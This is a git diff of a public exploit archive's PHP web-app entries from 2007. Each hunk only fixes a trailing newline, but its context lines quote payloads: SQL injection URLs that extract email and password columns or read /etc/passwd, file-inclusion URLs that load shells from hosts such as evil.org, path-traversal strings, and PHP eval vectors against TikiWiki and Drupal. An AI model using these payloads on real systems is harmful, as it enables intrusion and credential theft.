-40,4 +40,4 @@ http://www.site.com/[path]/?lang=fr&mod=login' UNION ALL SELECT concat(a_login , White_Sheep for his Bugs Hunter; ================================= -# milw0rm.com [2007-09-23] +# milw0rm.com [2007-09-23] \ No newline at end of file diff --git a/platforms/php/webapps/4451.txt b/platforms/php/webapps/4451.txt index 959e17e9e..31f5c980d 100755 --- a/platforms/php/webapps/4451.txt +++ b/platforms/php/webapps/4451.txt @@ -59,4 +59,4 @@ shadowcrew@hotmail.co.uk http://shadow.wizhoo.com/ -# milw0rm.com [2007-09-24] +# milw0rm.com [2007-09-24] \ No newline at end of file diff --git a/platforms/php/webapps/4454.txt b/platforms/php/webapps/4454.txt index dbbadf71c..2c4b10dab 100755 --- a/platforms/php/webapps/4454.txt +++ b/platforms/php/webapps/4454.txt @@ -58,4 +58,4 @@ __________?????______??????_________________________ ####specialthanx:####KEZZAP66345######################## ################################################## -# milw0rm.com [2007-09-24] +# milw0rm.com [2007-09-24] \ No newline at end of file diff --git a/platforms/php/webapps/4456.txt b/platforms/php/webapps/4456.txt index 332e203dc..c1a82559a 100755 --- a/platforms/php/webapps/4456.txt +++ b/platforms/php/webapps/4456.txt @@ -88,4 +88,4 @@ __________?????______??????_________________________ #####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..############################## ############################################################################################## -# milw0rm.com [2007-09-26] +# milw0rm.com [2007-09-26] \ No newline at end of file diff --git a/platforms/php/webapps/4457.txt b/platforms/php/webapps/4457.txt index f042cc590..6b08a551c 100755 --- a/platforms/php/webapps/4457.txt +++ b/platforms/php/webapps/4457.txt @@ -18,4 +18,4 @@ # TNX : GOD # ##################################################################################### -# milw0rm.com [2007-09-26] +# milw0rm.com [2007-09-26] \ No newline at end of file diff --git a/platforms/php/webapps/4459.txt b/platforms/php/webapps/4459.txt index fad0900e5..921764879 100755 --- a/platforms/php/webapps/4459.txt +++ b/platforms/php/webapps/4459.txt @@ -10,4 +10,4 @@ Exploit:/kb/index.php?ToDo=browse&catId=[SQL CODE] http://www.xxx.net/kb/index.html?ToDo=browse&catId=-20+union+select+1,concat(email,0x3a,password,0x3a,userid),3,4,5,6,7+from+user-- https://www.xxx.com/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7+members/* -# milw0rm.com [2007-09-26] +# milw0rm.com [2007-09-26] \ No newline at end of file diff --git a/platforms/php/webapps/4461.txt b/platforms/php/webapps/4461.txt index c5c0e26c9..1730bb95a 100755 --- a/platforms/php/webapps/4461.txt +++ b/platforms/php/webapps/4461.txt @@ -10,4 +10,4 @@ # POC : /forum/forum.php?view=Shell -# milw0rm.com [2007-09-27] +# milw0rm.com [2007-09-27] \ No newline at end of file diff --git a/platforms/php/webapps/4462.txt b/platforms/php/webapps/4462.txt index 25748a171..50013a00d 100755 --- a/platforms/php/webapps/4462.txt +++ b/platforms/php/webapps/4462.txt @@ -16,4 +16,4 @@ EXPLOIT: http://x.com/[patch]/admin/include/header.php?repertoire=http://evil.org/shell.txt ? -------------------------------------------------------------------------------------------------------------------- -# milw0rm.com [2007-09-27] +# milw0rm.com [2007-09-27] \ No newline at end of file diff --git a/platforms/php/webapps/4463.txt b/platforms/php/webapps/4463.txt index fa266a097..9913c7649 100755 --- a/platforms/php/webapps/4463.txt +++ b/platforms/php/webapps/4463.txt @@ -19,4 +19,4 @@ Kral kraldır! ------------------------ -# milw0rm.com [2007-09-27] +# milw0rm.com [2007-09-27] \ No newline at end of file diff --git a/platforms/php/webapps/4464.txt b/platforms/php/webapps/4464.txt index 23401a69c..77542e1f3 100755 --- a/platforms/php/webapps/4464.txt +++ b/platforms/php/webapps/4464.txt @@ -57,4 +57,4 @@ __________?????______??????_________________________ ####specialthanx:####Str0ke####Kezzap66345################ ################################################## -# milw0rm.com [2007-09-28] +# milw0rm.com [2007-09-28] \ No newline at end of file diff --git a/platforms/php/webapps/4465.txt b/platforms/php/webapps/4465.txt index ec917ddad..69ba468c8 100755 --- a/platforms/php/webapps/4465.txt +++ b/platforms/php/webapps/4465.txt @@ -6,4 +6,4 @@ news/newstopic_inc.php:2:if (!empty($indir)) include_once ($indir)."/newsdb/conf Expl0it: http://x.com/[path]/news/newstopic_inc.php?indir=http://evil.org/shell.txt -# milw0rm.com [2007-09-28] +# milw0rm.com [2007-09-28] \ No newline at end of file diff --git a/platforms/php/webapps/4466.php b/platforms/php/webapps/4466.php index 2e8c2f056..1bbadc950 100755 --- a/platforms/php/webapps/4466.php +++ b/platforms/php/webapps/4466.php @@ -148,4 +148,4 @@ function status() { } ?> -# milw0rm.com [2007-09-28] +# milw0rm.com [2007-09-28] \ No newline at end of file diff --git a/platforms/php/webapps/4467.pl b/platforms/php/webapps/4467.pl index d111772fe..2a7648d75 100755 --- a/platforms/php/webapps/4467.pl +++ b/platforms/php/webapps/4467.pl @@ -261,4 +261,4 @@ sub usage() { exit; } -# milw0rm.com [2007-09-29] +# milw0rm.com [2007-09-29] \ No newline at end of file diff --git a/platforms/php/webapps/4469.txt b/platforms/php/webapps/4469.txt index 8e32201ae..68531004f 100755 --- a/platforms/php/webapps/4469.txt +++ b/platforms/php/webapps/4469.txt @@ -30,4 +30,4 @@ Dork: cuAck!, wena naaaty xD ###################################### -# milw0rm.com [2007-09-29] +# milw0rm.com [2007-09-29] \ No newline at end of file diff --git a/platforms/php/webapps/4470.txt b/platforms/php/webapps/4470.txt index a8ea5d588..72c7cd880 100755 --- a/platforms/php/webapps/4470.txt +++ b/platforms/php/webapps/4470.txt @@ -46,4 +46,4 @@ ICQ: 249-613-511 /I am out =) -# milw0rm.com [2007-09-29] +# milw0rm.com [2007-09-29] \ No newline at end of file diff --git a/platforms/php/webapps/4471.txt b/platforms/php/webapps/4471.txt index 62ea8cfe2..2e558f0c5 100755 --- a/platforms/php/webapps/4471.txt +++ b/platforms/php/webapps/4471.txt @@ -22,4 +22,4 @@ = = ============================================ -# milw0rm.com [2007-09-30] +# milw0rm.com [2007-09-30] \ No newline at end of file diff --git a/platforms/php/webapps/4472.txt b/platforms/php/webapps/4472.txt index 896cfc8bd..f32a37126 100755 --- a/platforms/php/webapps/4472.txt +++ b/platforms/php/webapps/4472.txt @@ -72,4 +72,4 @@ [!] Solution: Install security update to v1.57 -# milw0rm.com [2007-10-01] +# milw0rm.com [2007-10-01] \ No newline at end of file diff --git a/platforms/php/webapps/4473.txt b/platforms/php/webapps/4473.txt index 5ee44e102..ecff09426 100755 --- a/platforms/php/webapps/4473.txt +++ b/platforms/php/webapps/4473.txt @@ -38,4 +38,4 @@ [!] Solution: Install update to v1.995 -# milw0rm.com [2007-10-01] +# milw0rm.com [2007-10-01] \ No newline at end of file diff --git a/platforms/php/webapps/4475.php b/platforms/php/webapps/4475.php index d6a1167ee..cc0bb26fb 100755 --- a/platforms/php/webapps/4475.php +++ b/platforms/php/webapps/4475.php @@ -71,4 +71,4 @@ else echo("Bug Fixed..sorry!\n"); exit(); ?> -# milw0rm.com [2007-10-01] +# milw0rm.com [2007-10-01] \ No newline at end of file diff --git a/platforms/php/webapps/4476.txt b/platforms/php/webapps/4476.txt index 0e4612c5e..0c0251204 100755 --- a/platforms/php/webapps/4476.txt +++ b/platforms/php/webapps/4476.txt @@ -74,4 +74,4 @@ __________?????______??????_________________________ #####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..############################## ############################################################################################## -# milw0rm.com [2007-10-01] +# milw0rm.com [2007-10-01] \ No newline at end of file diff --git a/platforms/php/webapps/4477.txt b/platforms/php/webapps/4477.txt index f6f67ec2c..c7e8110f2 100755 --- a/platforms/php/webapps/4477.txt +++ b/platforms/php/webapps/4477.txt @@ -91,4 +91,4 @@ __________?????______??????_________________________ #####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..############################## ############################################################################################## -# milw0rm.com [2007-10-01] +# milw0rm.com [2007-10-01] \ No newline at end of file diff --git a/platforms/php/webapps/4480.pl b/platforms/php/webapps/4480.pl index 4ba9e2510..c5936f0b7 100755 --- a/platforms/php/webapps/4480.pl +++ b/platforms/php/webapps/4480.pl @@ -132,4 +132,4 @@ sub istrue2 } } -# milw0rm.com [2007-10-02] +# milw0rm.com [2007-10-02] \ No newline at end of file diff --git a/platforms/php/webapps/4481.txt b/platforms/php/webapps/4481.txt index 2e9625c89..d6f8f8c57 100755 --- a/platforms/php/webapps/4481.txt +++ b/platforms/php/webapps/4481.txt @@ -11,4 +11,4 @@ poppawid/mail/childwindow.inc.php:33: # WwW.SoQoR.NeT -# milw0rm.com [2007-10-06] +# milw0rm.com [2007-10-06] \ No newline at end of file diff --git a/platforms/php/webapps/4491.php b/platforms/php/webapps/4491.php index 7bdefc895..a2a226c7a 100755 --- a/platforms/php/webapps/4491.php +++ b/platforms/php/webapps/4491.php @@ -64,4 +64,4 @@ Else #WwW.SoQoR.NeT ?> -# milw0rm.com [2007-10-06] +# milw0rm.com [2007-10-06] \ No newline at end of file diff --git a/platforms/php/webapps/4492.txt b/platforms/php/webapps/4492.txt index f1f9ad970..690fb333f 100755 --- a/platforms/php/webapps/4492.txt +++ b/platforms/php/webapps/4492.txt @@ -23,4 +23,4 @@ http://today4host.net/scripts/short/?id=682 ================================================== ================================================== -# milw0rm.com [2007-10-06] +# milw0rm.com [2007-10-06] \ No newline at end of file diff --git a/platforms/php/webapps/4493.txt b/platforms/php/webapps/4493.txt index 34de321d9..09b860fe6 100755 --- a/platforms/php/webapps/4493.txt +++ b/platforms/php/webapps/4493.txt @@ -13,4 +13,4 @@ # dork : Powered by SkaDate Dating -# milw0rm.com [2007-10-06] +# milw0rm.com [2007-10-06] \ No newline at end of file diff --git a/platforms/php/webapps/4494.txt b/platforms/php/webapps/4494.txt index d4a4bc965..cecc896bb 100755 --- a/platforms/php/webapps/4494.txt +++ b/platforms/php/webapps/4494.txt @@ -29,4 +29,4 @@ #My 3N3mY ?: ...Mish and Dark If Y0u FUck w1t me,I'll pUt my f00t in y0ur aSs !... ##################################################################################### -# milw0rm.com [2007-10-07] +# milw0rm.com [2007-10-07] \ No newline at end of file diff --git a/platforms/php/webapps/4495.txt b/platforms/php/webapps/4495.txt index d2a197d46..d2b8f9adb 100755 --- a/platforms/php/webapps/4495.txt +++ b/platforms/php/webapps/4495.txt @@ -13,4 +13,4 @@ error.php?err_msg= templates/simple/ia.php?content= # WwW.SoQoR.NeT -# milw0rm.com [2007-10-07] +# milw0rm.com [2007-10-07] \ No newline at end of file diff --git a/platforms/php/webapps/4496.txt b/platforms/php/webapps/4496.txt index 23c31cb48..9dad91cfb 100755 --- a/platforms/php/webapps/4496.txt +++ b/platforms/php/webapps/4496.txt @@ -23,4 +23,4 @@ = = ============================================ -# milw0rm.com [2007-10-07] +# milw0rm.com [2007-10-07] \ No newline at end of file diff --git a/platforms/php/webapps/4497.txt b/platforms/php/webapps/4497.txt index 6c2b3ab31..c244b29ff 100755 --- a/platforms/php/webapps/4497.txt +++ b/platforms/php/webapps/4497.txt @@ -33,4 +33,4 @@ http://localhost/path/administrator/components/com_wmtportfolio/admin.wmtportfol ================================================================================================================================== -# milw0rm.com [2007-10-07] +# milw0rm.com [2007-10-07] \ No newline at end of file diff --git a/platforms/php/webapps/4499.txt b/platforms/php/webapps/4499.txt index 9783d3932..d84aae1f5 100755 --- a/platforms/php/webapps/4499.txt +++ b/platforms/php/webapps/4499.txt @@ -18,4 +18,4 @@ bug found: "http://www.site.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell] " "http://www.site.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell] " -# milw0rm.com [2007-10-08] +# milw0rm.com [2007-10-08] \ No newline at end of file diff --git a/platforms/php/webapps/4500.txt b/platforms/php/webapps/4500.txt index ba4763435..44f3ff487 100755 --- a/platforms/php/webapps/4500.txt +++ b/platforms/php/webapps/4500.txt @@ -12,4 +12,4 @@ pjirc/css.php?color= browse.php?cat= # WwW.SoQoR.NeT -# milw0rm.com [2007-10-08] +# milw0rm.com [2007-10-08] \ No newline at end of file diff --git a/platforms/php/webapps/4501.php b/platforms/php/webapps/4501.php index 2267a03dd..5a0825fd9 100755 --- a/platforms/php/webapps/4501.php +++ b/platforms/php/webapps/4501.php @@ -34,4 +34,4 @@ echo '--------------------'; ?> -# milw0rm.com [2007-10-08] +# milw0rm.com [2007-10-08] \ No newline at end of file diff --git a/platforms/php/webapps/4502.txt b/platforms/php/webapps/4502.txt index 5aae1b47f..2996cac08 100755 --- a/platforms/php/webapps/4502.txt +++ b/platforms/php/webapps/4502.txt @@ -22,4 +22,4 @@ str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy .. BorN To K!LL <> GoLd_M = 4ever ... =P -# milw0rm.com [2007-10-08] +# milw0rm.com [2007-10-08] \ No newline at end of file diff --git a/platforms/php/webapps/4503.txt b/platforms/php/webapps/4503.txt index df8fb2582..f3524991b 100755 --- a/platforms/php/webapps/4503.txt +++ b/platforms/php/webapps/4503.txt @@ -23,4 +23,4 @@ http://[TARGET]/[PATH]/common.php?livealbum_dir=http://xmors.by.ry/r57.php? +---------------------------------------------------------------------------------------------+ -# milw0rm.com [2007-10-08] +# milw0rm.com [2007-10-08] \ No newline at end of file diff --git a/platforms/php/webapps/4504.txt b/platforms/php/webapps/4504.txt index fd86ea046..b6df23388 100755 --- a/platforms/php/webapps/4504.txt +++ b/platforms/php/webapps/4504.txt @@ -21,4 +21,4 @@ # TNX : GOD # ##################################################################################### -# milw0rm.com [2007-10-08] +# milw0rm.com [2007-10-08] \ No newline at end of file diff --git a/platforms/php/webapps/4505.php b/platforms/php/webapps/4505.php index b01cdaeca..a9c263cdc 100755 --- a/platforms/php/webapps/4505.php +++ b/platforms/php/webapps/4505.php @@ -212,4 +212,4 @@ if (strstr($html,"666999")) # Coded With BH Fast Generator v0.1 ?> -# milw0rm.com [2007-10-09] +# milw0rm.com [2007-10-09] \ No newline at end of file diff --git a/platforms/php/webapps/4507.txt b/platforms/php/webapps/4507.txt index 8141332d4..09a128058 100755 --- a/platforms/php/webapps/4507.txt +++ b/platforms/php/webapps/4507.txt @@ -37,4 +37,4 @@ ================================================================================================================================== -# milw0rm.com [2007-10-10] +# milw0rm.com [2007-10-10] \ No newline at end of file diff --git a/platforms/php/webapps/4508.txt b/platforms/php/webapps/4508.txt index 0fc5c3088..49f116894 100755 --- a/platforms/php/webapps/4508.txt +++ b/platforms/php/webapps/4508.txt @@ -61,4 +61,4 @@ ================================================================================================================================== -# milw0rm.com [2007-10-10] +# milw0rm.com [2007-10-10] \ No newline at end of file diff --git a/platforms/php/webapps/4509.txt b/platforms/php/webapps/4509.txt index 716ddbf5f..d16f9b146 100755 --- a/platforms/php/webapps/4509.txt +++ b/platforms/php/webapps/4509.txt @@ -2,4 +2,4 @@ TikiWiki 1.9.8 Remote PHP Injection Vulnerability Example: http:/server/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title= -# milw0rm.com [2007-10-10] +# milw0rm.com [2007-10-10] \ No newline at end of file diff --git a/platforms/php/webapps/4510.txt b/platforms/php/webapps/4510.txt index aeac2c6b0..988f7273b 100755 --- a/platforms/php/webapps/4510.txt +++ b/platforms/php/webapps/4510.txt @@ -2,4 +2,4 @@ Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/ -# milw0rm.com [2007-10-10] +# milw0rm.com [2007-10-10] \ No newline at end of file diff --git a/platforms/php/webapps/4518.txt b/platforms/php/webapps/4518.txt index c2a65156e..a5669eb2d 100755 --- a/platforms/php/webapps/4518.txt +++ b/platforms/php/webapps/4518.txt @@ -38,4 +38,4 @@ http://[TARGET]/[PATH]/wsk/wsk.php?wsk=[-Sh3ll-] +---------------------------------------------------------------------------------------------+ -# milw0rm.com [2007-10-11] +# milw0rm.com [2007-10-11] \ No newline at end of file diff --git a/platforms/php/webapps/4519.txt b/platforms/php/webapps/4519.txt index 9c9219c9a..bb76da672 100755 --- a/platforms/php/webapps/4519.txt +++ b/platforms/php/webapps/4519.txt @@ -35,4 +35,4 @@ http://[TARGET]/[PATH]/active/components/xmlrpc/client.php?c[components]=[-Sh3ll +---------------------------------------------------------------------------------------------+ -# milw0rm.com [2007-10-11] +# milw0rm.com [2007-10-11] \ No newline at end of file diff --git a/platforms/php/webapps/4520.txt b/platforms/php/webapps/4520.txt index 93e35c88a..ff4479fc8 100755 --- a/platforms/php/webapps/4520.txt +++ b/platforms/php/webapps/4520.txt @@ -12,4 +12,4 @@ FUN BUG in index.php: EXPLOIT: http://x.com/index.php?pagina=http://evil.org/shell.txt? -# milw0rm.com [2007-10-11] +# milw0rm.com [2007-10-11] \ No newline at end of file diff --git a/platforms/php/webapps/4521.txt b/platforms/php/webapps/4521.txt index a732b921c..42a096b42 100755 --- a/platforms/php/webapps/4521.txt +++ b/platforms/php/webapps/4521.txt @@ -29,4 +29,4 @@ cepuzmani_53,kalaba,Dr.X --------------------------------------- -# milw0rm.com [2007-10-11] +# milw0rm.com [2007-10-11] \ No newline at end of file diff --git a/platforms/php/webapps/4523.pl b/platforms/php/webapps/4523.pl index 1e5e0057c..e60675a3c 100755 --- a/platforms/php/webapps/4523.pl +++ b/platforms/php/webapps/4523.pl @@ -192,4 +192,4 @@ print q( ); } -# milw0rm.com [2007-10-11] +# milw0rm.com [2007-10-11] \ No newline at end of file diff --git a/platforms/php/webapps/4524.txt b/platforms/php/webapps/4524.txt index b775ad01d..45a5ec65f 100755 --- a/platforms/php/webapps/4524.txt +++ b/platforms/php/webapps/4524.txt @@ -37,4 +37,4 @@ Thanx: mdx :) -------------------- -# milw0rm.com [2007-10-12] +# milw0rm.com [2007-10-12] \ No newline at end of file diff --git a/platforms/php/webapps/4525.pl b/platforms/php/webapps/4525.pl index 0473ac63c..2e0d4962c 100755 --- a/platforms/php/webapps/4525.pl +++ b/platforms/php/webapps/4525.pl @@ -65,4 +65,4 @@ sub exploit() } } -# milw0rm.com [2007-10-12] +# milw0rm.com [2007-10-12] \ No newline at end of file diff --git a/platforms/php/webapps/4527.txt b/platforms/php/webapps/4527.txt index 17ae5d2d4..dd9287723 100755 --- a/platforms/php/webapps/4527.txt +++ b/platforms/php/webapps/4527.txt @@ -18,4 +18,4 @@ # TNX : GOD # ##################################################################################### -# milw0rm.com [2007-10-13] +# milw0rm.com [2007-10-13] \ No newline at end of file diff --git a/platforms/php/webapps/4528.txt b/platforms/php/webapps/4528.txt index 2f5952dbb..256561c45 100755 --- a/platforms/php/webapps/4528.txt +++ b/platforms/php/webapps/4528.txt @@ -22,4 +22,4 @@ Bundan sonra hep tek, hep yek xoron..! -------------------- -# milw0rm.com [2007-10-13] +# milw0rm.com [2007-10-13] \ No newline at end of file diff --git a/platforms/php/webapps/4536.txt b/platforms/php/webapps/4536.txt index 7791d4d64..ca79d617c 100755 --- a/platforms/php/webapps/4536.txt +++ b/platforms/php/webapps/4536.txt @@ -38,4 +38,4 @@ | @vladii 2007 | |______________________________________________________| -# milw0rm.com [2007-10-15] +# milw0rm.com [2007-10-15] \ No newline at end of file diff --git a/platforms/php/webapps/4538.txt b/platforms/php/webapps/4538.txt index c3189846e..0f66671a0 100755 --- a/platforms/php/webapps/4538.txt +++ b/platforms/php/webapps/4538.txt @@ -36,4 +36,4 @@ PitBull Crew - The_PitBull - MaxDeMon - SancheZ - RedBull - ResellerZ milw0rm.com - str0ke darkc0de.com - d3hydr8 -# milw0rm.com [2007-10-16] +# milw0rm.com [2007-10-16] \ No newline at end of file diff --git a/platforms/php/webapps/4539.txt b/platforms/php/webapps/4539.txt index 3eb28a6b7..7afaa7913 100755 --- a/platforms/php/webapps/4539.txt +++ b/platforms/php/webapps/4539.txt @@ -18,4 +18,4 @@ # MEFISTO,KınSıze,CyberGhost #tr# ##################################################################################### -# milw0rm.com [2007-10-16] +# milw0rm.com [2007-10-16] \ No newline at end of file diff --git a/platforms/php/webapps/4543.txt b/platforms/php/webapps/4543.txt index 394051d51..8565f33a4 100755 --- a/platforms/php/webapps/4543.txt +++ b/platforms/php/webapps/4543.txt @@ -8,4 +8,4 @@ POC : Thanx To : Tryag.Com/cc & Asb-May.net/bb ################################################################ -# milw0rm.com [2007-10-17] +# milw0rm.com [2007-10-17] \ No newline at end of file diff --git a/platforms/php/webapps/4544.txt b/platforms/php/webapps/4544.txt index 8bf688398..cb1b058f7 100755 --- a/platforms/php/webapps/4544.txt +++ b/platforms/php/webapps/4544.txt @@ -34,4 +34,4 @@ http://[TARGET]/[PATH]/classes/core/language.php?rootdir=[-Sh3ll-] +---------------------------------------------------------------------------------------------+ -# milw0rm.com [2007-10-17] +# milw0rm.com [2007-10-17] \ No newline at end of file diff --git a/platforms/php/webapps/4545.txt b/platforms/php/webapps/4545.txt index f4730b5a5..2f078786f 100755 --- a/platforms/php/webapps/4545.txt +++ b/platforms/php/webapps/4545.txt @@ -39,4 +39,4 @@ http://[TARGET]/[PATH]/awzmb/modules/core/core.incl.php?Setting[OPT_includepath] +---------------------------------------------------------------------------------------------+ -# milw0rm.com [2007-10-18] +# milw0rm.com [2007-10-18] \ No newline at end of file diff --git a/platforms/php/webapps/4546.txt b/platforms/php/webapps/4546.txt index 31a4af199..de49dd22e 100755 --- a/platforms/php/webapps/4546.txt +++ b/platforms/php/webapps/4546.txt @@ -8,4 +8,4 @@ # Vuln: : /chat/admin/inc/help.php?file=[LFI] -# milw0rm.com [2007-10-19] +# milw0rm.com [2007-10-19] \ No newline at end of file diff --git a/platforms/php/webapps/4547.pl b/platforms/php/webapps/4547.pl index 12e6bf0cb..d6b6ed5b1 100755 --- a/platforms/php/webapps/4547.pl +++ b/platforms/php/webapps/4547.pl @@ -319,4 +319,4 @@ sub hex_encode{ return $encoded; } -# milw0rm.com [2007-10-20] +# milw0rm.com [2007-10-20] \ No newline at end of file diff --git a/platforms/php/webapps/4548.php b/platforms/php/webapps/4548.php index 5d6e15525..27c737d4d 100755 --- a/platforms/php/webapps/4548.php +++ b/platforms/php/webapps/4548.php @@ -169,4 +169,4 @@ function status() { function getmicrotime() {return array_sum(explode(" ", microtime()));} ?> -# milw0rm.com [2007-10-20] +# milw0rm.com [2007-10-20] \ No newline at end of file diff --git a/platforms/php/webapps/4549.txt b/platforms/php/webapps/4549.txt index 8a604163f..cb647c195 100755 --- a/platforms/php/webapps/4549.txt +++ b/platforms/php/webapps/4549.txt @@ -59,4 +59,4 @@ # /modules/tasks/summary.inc.php?m_path=../../../../../../etc/passwd%00 # /modules/useradm/index.php?module=../../../../../../etc/passwd%00 -# milw0rm.com [2007-10-21] +# milw0rm.com [2007-10-21] \ No newline at end of file diff --git a/platforms/php/webapps/4550.pl b/platforms/php/webapps/4550.pl index 36ab5579d..45b70f215 100755 --- a/platforms/php/webapps/4550.pl +++ b/platforms/php/webapps/4550.pl @@ -76,4 +76,4 @@ else {table();} #Je Suis Triste Vraiment Triste Et Je ne Sais Pas Pourquoi,PourTant je ne dois pas l'être, -# milw0rm.com [2007-10-21] +# milw0rm.com [2007-10-21] \ No newline at end of file diff --git a/platforms/php/webapps/4551.txt b/platforms/php/webapps/4551.txt index 6002e4bd4..b33abb7b9 100755 --- a/platforms/php/webapps/4551.txt +++ b/platforms/php/webapps/4551.txt @@ -74,4 +74,4 @@ # /web/includes/functions/html_generate.php?path_prefix=shell # /web/includes/functions/validations.php?path_prefix=shell -# milw0rm.com [2007-10-21] +# milw0rm.com [2007-10-21] \ No newline at end of file diff --git a/platforms/php/webapps/4554.txt b/platforms/php/webapps/4554.txt index d6d10a1c1..69c82d1de 100755 --- a/platforms/php/webapps/4554.txt +++ b/platforms/php/webapps/4554.txt @@ -28,4 +28,4 @@ shadowcrew@hotmail.co.uk shadow.php0h.com -# milw0rm.com [2007-10-22] +# milw0rm.com [2007-10-22] \ No newline at end of file diff --git a/platforms/php/webapps/4555.txt b/platforms/php/webapps/4555.txt index 6a3460504..483b6042b 100755 --- a/platforms/php/webapps/4555.txt +++ b/platforms/php/webapps/4555.txt @@ -2,4 +2,4 @@ TOWeLS version 0.1 (scripture.php) Remote File Inclusion Vulnerability http://sourceforge.net/project/showfiles.php?group_id=126659 / towels-0.1.zip / /towels-0.1/src/scripture.php?pageHeaderFile=http://localhost/shell.txt? -# milw0rm.com [2007-10-22] +# milw0rm.com [2007-10-22] \ No newline at end of file diff --git a/platforms/php/webapps/4557.txt b/platforms/php/webapps/4557.txt index 0ec22b018..036f6b414 100755 --- a/platforms/php/webapps/4557.txt +++ b/platforms/php/webapps/4557.txt @@ -728,4 +728,4 @@ //Greetz: ddx39, berga, wo, overlock[] -# milw0rm.com [2007-10-22] +# milw0rm.com [2007-10-22] \ No newline at end of file diff --git a/platforms/php/webapps/4558.txt b/platforms/php/webapps/4558.txt index 1cc716677..505701b15 100755 --- a/platforms/php/webapps/4558.txt +++ b/platforms/php/webapps/4558.txt @@ -24,4 +24,4 @@ str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy ... BorN To K!LL <> Dr.2 = 4ever .... =D -# milw0rm.com [2007-10-22] +# milw0rm.com [2007-10-22] \ No newline at end of file diff --git a/platforms/php/webapps/4561.txt b/platforms/php/webapps/4561.txt index 72b8d1a7e..a90fe0bbf 100755 --- a/platforms/php/webapps/4561.txt +++ b/platforms/php/webapps/4561.txt @@ -58,4 +58,4 @@ http://[target]/[flatnuke3_path]/index.php?mod=none_filemanager&dir=/[script_pat Do you wanna another way to exploit this vuln? Use your brain! :P --------------------------------------------------------------- -# milw0rm.com [2007-10-23] +# milw0rm.com [2007-10-23] \ No newline at end of file diff --git a/platforms/php/webapps/4562.txt b/platforms/php/webapps/4562.txt index 4af07078a..c6312eb5c 100755 --- a/platforms/php/webapps/4562.txt +++ b/platforms/php/webapps/4562.txt @@ -47,4 +47,4 @@ the description and it will be execute! Nice, dontcha? :P --------------------------------------------------------------- -# milw0rm.com [2007-10-23] +# milw0rm.com [2007-10-23] \ No newline at end of file diff --git a/platforms/php/webapps/4563.txt b/platforms/php/webapps/4563.txt index c42858056..cab89c96d 100755 --- a/platforms/php/webapps/4563.txt +++ b/platforms/php/webapps/4563.txt @@ -34,4 +34,4 @@ shadowcrew@hotmail.co.uk shadow.php0h.com ---------------------------------------------- -# milw0rm.com [2007-10-23] +# milw0rm.com [2007-10-23] \ No newline at end of file diff --git a/platforms/php/webapps/4565.txt b/platforms/php/webapps/4565.txt index f7c5a1d84..af003a45d 100755 --- a/platforms/php/webapps/4565.txt +++ b/platforms/php/webapps/4565.txt @@ -19,4 +19,4 @@ http://site/xarg_corner_top.php?xarg=http://shell.php? Tnx to: d3hydr8, str0ke -# milw0rm.com [2007-10-23] +# milw0rm.com [2007-10-23] \ No newline at end of file diff --git a/platforms/php/webapps/4568.txt b/platforms/php/webapps/4568.txt index d35dd3d79..4f1174ba1 100755 --- a/platforms/php/webapps/4568.txt +++ b/platforms/php/webapps/4568.txt @@ -60,4 +60,4 @@ Timeline: 25.10.2007 - vendor released patch 25.10.2007 - public disclosure -# milw0rm.com [2007-10-25] +# milw0rm.com [2007-10-25] \ No newline at end of file diff --git a/platforms/php/webapps/4575.txt b/platforms/php/webapps/4575.txt index 76139899b..ca9b83fe8 100755 --- a/platforms/php/webapps/4575.txt +++ b/platforms/php/webapps/4575.txt @@ -14,4 +14,4 @@ # /include/inc_freigabe3.php?include_path=http://localhost/scripts/020.txt? ################################################################################# -# milw0rm.com [2007-10-27] +# milw0rm.com [2007-10-27] \ No newline at end of file diff --git a/platforms/php/webapps/4576.txt b/platforms/php/webapps/4576.txt index e7cba29ee..aa39869fc 100755 --- a/platforms/php/webapps/4576.txt +++ b/platforms/php/webapps/4576.txt @@ -39,4 +39,4 @@ No registration is needed!! JobSite Professional v2.0 Remote SQL Injection Vulnerability ######################################################################### -# milw0rm.com [2007-10-28] +# milw0rm.com [2007-10-28] \ No newline at end of file diff --git a/platforms/php/webapps/4577.txt b/platforms/php/webapps/4577.txt index a1db25eaa..3d3c64a77 100755 --- a/platforms/php/webapps/4577.txt +++ b/platforms/php/webapps/4577.txt @@ -7,4 +7,4 @@ author:mozi2weed@yahoo.com site:http://mozi.rootmybox.org support:http://darkc0de.com & whoami -# milw0rm.com [2007-10-28] +# milw0rm.com [2007-10-28] \ No newline at end of file diff --git a/platforms/php/webapps/4580.txt b/platforms/php/webapps/4580.txt index e51223560..35964953e 100755 --- a/platforms/php/webapps/4580.txt +++ b/platforms/php/webapps/4580.txt @@ -3,4 +3,4 @@ http://heanet.dl.sourceforge.net/sourceforge/fireconfig/fireconfig_v0.5.tar.gz POC : /dl.php?file=../../../../../../etc/passwd%00 -# milw0rm.com [2007-10-28] +# milw0rm.com [2007-10-28] \ No newline at end of file diff --git a/platforms/php/webapps/4581.txt b/platforms/php/webapps/4581.txt index 21222eee7..2de8cb488 100755 --- a/platforms/php/webapps/4581.txt +++ b/platforms/php/webapps/4581.txt @@ -5,4 +5,4 @@ % /inc/sige_init.php?SYS_PATH=http://localhost/scripts/020.txt? %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -# milw0rm.com [2007-10-28] +# milw0rm.com [2007-10-28] \ No newline at end of file diff --git a/platforms/php/webapps/4582.txt b/platforms/php/webapps/4582.txt index 9d30232a3..e89d1c82f 100755 --- a/platforms/php/webapps/4582.txt +++ b/platforms/php/webapps/4582.txt @@ -11,4 +11,4 @@ http://localhost/path/teatro/pub/pub08_comments.php?basePath=shell.txt # Thanx: AsbMay's Group & City Of Ghosts Team & Sniper-sa Team # 